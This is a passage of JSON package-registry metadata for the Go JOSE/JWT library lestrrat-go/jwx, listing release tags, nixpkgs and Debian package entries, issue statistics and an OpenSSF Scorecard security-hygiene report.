itHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.204Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.09274594572081,"dependent_packages_count":5.71052111692275,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.90163353132178},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwe/internal/aescbc/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwe%2Finternal%2Faescbc/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":12782817,"name":"jwx","ecosystem":"nixpkgs","description":" Implementation of various JWx (Javascript Object Signing and Encryption/JOSE) technologies","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T11:17:32.343Z","latest_release_published_at":"2026-01-26T11:17:32.343Z","latest_release_number":"2.0.9","last_synced_at":"2026-03-05T20:27:19.087Z","created_at":"2026-01-26T11:17:32.187Z","updated_at":"2026-03-25T17:02:36.759Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=jwx","install_command":"nix-env -iA nixpkgs.jwx","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/tools/security/jwx/default.nix#L22","metadata":{"nix_attribute":"jwx-2.0.9","position":"pkgs/tools/security/jwx/default.nix:22","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.758Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/jwx?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/jwx/codemeta","maintainers":[{"uuid":"arianvp","login":null,"name":"Arian van Putten","email":"arian.vanputten@gmail.com","url":"https://github.com/arianvp","packages_count":10,"html_url":null,"role":null,"created_at":"2026-03-05T20:27:19.331Z","updated_at":"2026-03-05T20:27:19.331Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/arianvp/packages"},{"uuid":"flokli","login":null,"name":"Florian Klink","email":"flokli@flokli.de","url":"https://github.com/flokli","packages_count":69,"html_url":null,"role":null,"created_at":"2026-03-05T20:27:19.609Z","updated_at":"2026-03-05T20:27:19.609Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/flokli/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":183},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-06-10T05:16:22.193Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":13646092,"name":"golang-github-lestrrat-go-jwx","ecosystem":"debian","description":null,"homepage":"https://github.com/lestrrat-go/jwx","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T03:24:26.407Z","latest_release_published_at":"2026-02-12T03:24:26.407Z","latest_release_number":"2.1.4-1","last_synced_at":"2026-03-13T19:16:17.605Z","created_at":"2026-02-12T03:24:26.214Z","updated_at":"2026-03-25T17:02:36.745Z","registry_url":"https://tracker.debian.org/pkg/golang-github-lestrrat-go-jwx","install_command":"apt-get install golang-github-lestrrat-go-jwx","documentation_url":"https://packages.debian.org/trixie/golang-github-lestrrat-go-jwx","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"golang-github-lestrrat-go-jwx-dev","standards_version":"4.7.2","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-sequence-golang, golang-any, golang-github-lestrrat-go-backoff-dev, golang-github-lestrrat-go-blackmagic-dev, golang-github-lestrrat-go-httpcc-dev, golang-github-lestrrat-go-httprc-dev, golang-github-lestrrat-go-iter-dev, golang-github-lestrrat-go-option-dev, golang-github-pkg-errors-dev, golang-github-stretchr-testify-dev, golang-golang-x-crypto-dev","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file 